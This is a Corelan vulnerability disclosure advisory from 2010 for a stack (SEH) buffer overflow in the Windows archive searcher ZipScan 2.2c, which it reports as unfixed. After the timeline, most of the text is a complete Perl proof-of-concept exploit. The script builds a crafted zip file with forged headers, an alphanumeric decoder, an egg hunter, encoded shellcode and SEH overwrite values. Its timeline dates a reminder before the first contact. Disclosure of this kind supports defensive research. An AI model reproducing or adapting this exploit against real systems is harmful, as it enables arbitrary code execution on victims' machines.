ZipScan 2.2c Buffer Overflow

`  
|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |   
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-020  
Disclosure date : April 3rd, 2010  
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-020  
  
  
00 : Vulnerability information  
-------------------------------------  
Product : ZipScan 2.2c  
Version : 2.2c (latest version)  
Vendor : [email protected] / http://www.zipscan.co.uk/  
URL : http://www.zipscan.co.uk/download.htm  
Platform : Windows  
Type of vulnerability : Stack overflow  
Risk rating : medium  
Issue fixed in version : not fixed  
Vulnerability discovered by : Lincoln  
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/  
  
  
01 : Vendor description of software  
-------------------------------------  
>From the vendor website:  
"ZipScan searches archive files. It can search Zip, CAB, RAR, ACE,  
InstallShield CAB, JAR, TAR, GZIP, Z, ZOO, LZH, ARJ, CHM and  
OpenOffice files, including password-protected, nested and  
self-extracting archives. The program supports text searching and can  
open and extract files."  
  
02 : Vulnerability details  
-------------------------------------  
When a specially crafted zip file is opened from within ZipScan,  
an exception handler gets overwritten, allowing to trigger arbitrary  
code execution.   
The way to trigger the vulnerability :  
  
- open the zip file from within ZipScan : "File - Open Archive File"  
Or  
- Click "open archive file and view its contents"  
- double-click on the filename inside the zip file  
  
  
03 : Author/Vendor communication  
-------------------------------------  
March 23 2010 : author contacted  
March 20 2010 : sent reminder  
April 3 2010 : No response, public disclosure  
  
  
04 : PoC  
----------  
#!/usr/bin/perl  
# Software : ZipScan 2.2c (.zip)  
# Bug found by : Lincoln  
# Author : Lincoln & corelanc0d3r  
# OS : Windows  
# Tested on : XP SP3 En (VirtualBox)  
# Type of vuln : SEH  
# Greetz to : Corelan Security Team  
# http://www.corelan.be:8800/index.php/security/corelan-team-members/  
#  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
#  
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.  
#  
#  
# Code :  
print "|------------------------------------------------------------------|\n";  
print "| __ __ |\n";  
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";  
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";  
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";  
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";  
print "| |\n";  
print "| http://www.corelan.be:8800 |\n";  
print "| |\n";  
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";  
print "[+] Exploit for ZipScan 2.2c \n";  
  
  
  
my $filename="zipscan.zip";  
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00" .  
"\x88\x13" .# file size: 5k  
"\x00\x00\x00";  
  
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x88\x13". # file size: 5k  
"\x00\x00\x00\x00\x00\x00\x01\x00".  
"\x24\x00\x00\x00\x00\x00\x00\x00";  
  
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".  
"\xb6\x13\x00\x00". # +46  
"\xa6\x13\x00\x00". # +30  
"\x00\x00";  
  
my $decoder =  
#pop edx pop esp  
"\x5b\x5b\x5b\x5b\x5c".  
  
#jmp ebp  
"\x25\x4A\x4D\x4E\x55".  
"\x25\x35\x32\x31\x2A".  
"\x2d\x55\x55\x55\x64".  
"\x2d\x55\x55\x55\x64".  
"\x2d\x56\x55\x56\x51".  
"\x50".  
  
#add ebp, 526h  
"\x25\x4A\x4D\x4E\x55".  
"\x25\x35\x32\x31\x2A".  
"\x2d\x35\x69\x48\x54".  
"\x2d\x25\x69\x48\x54".  
"\x2d\x25\x68\x48\x52".  
"\x50".  
  
#jmp back to decoded op code  
"\x7a\xb5";  
  
#basereg ebp, modified egg hunter mov edx,ebp  
#points egg hunter to unmodified shellcode  
my $egg =  
"UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".  
"BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".  
"nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";  
  
#msg box "Exploited by Corelan Security Team"  
#encoded with Alpha2 base reg edi  
my $shellcode =  
"w00tw00t".  
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".  
"BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".  
"9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".  
"KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".  
"JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".  
"rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".  
"NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".  
"vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".  
"QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".  
"uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".  
"jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".  
"orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".  
"T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".  
"D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".  
"vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".  
"1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".  
"8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".  
"rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".  
"yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".  
"OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".  
"Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".  
"LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".  
"PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".  
"hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".  
"T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".  
"9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".  
"QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".  
"cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".  
"UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".  
"XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".  
"MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".  
"qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";  
  
#Filler  
my $mjunk = "A" x 30;  
  
# --- payload --- 5k total  
my $junk = "A" x 22 . $egg . "A" x 3427;  
my $nseh="\x7a\x06\x41\x41";  
my $seh="\x16\x09\x01\x10"; #universal  
my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;  
$payload = $payload . ".txt";  
  
print "[+] Size : " . length($payload)."\n";  
system("del $filename");  
print "[+] Creating new vulnerable file: $filename\n\n";  
open(FILE, ">$filename");  
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;  
close(FILE);  
`